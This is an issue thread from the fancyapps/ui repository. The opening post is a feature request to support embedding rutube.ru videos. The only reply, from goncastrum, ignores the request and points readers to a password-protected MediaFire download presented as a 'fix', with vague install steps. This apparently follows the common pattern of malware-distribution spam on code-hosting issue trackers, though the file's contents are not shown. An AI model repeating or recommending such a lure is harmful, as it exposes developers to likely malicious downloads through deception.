### ISSUE TITLE
Add support for videos from rutube

### ISSUE THREAD

**Issue by Edick1337** [fancyapps/ui#690]
### Is your feature request related to a problem? Please describe.

Now it's not possible to embed videos from rutube.ru like from youtube

### Describe the solution you'd like

Add support for rutube so it'll be possible to embed videos from it

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
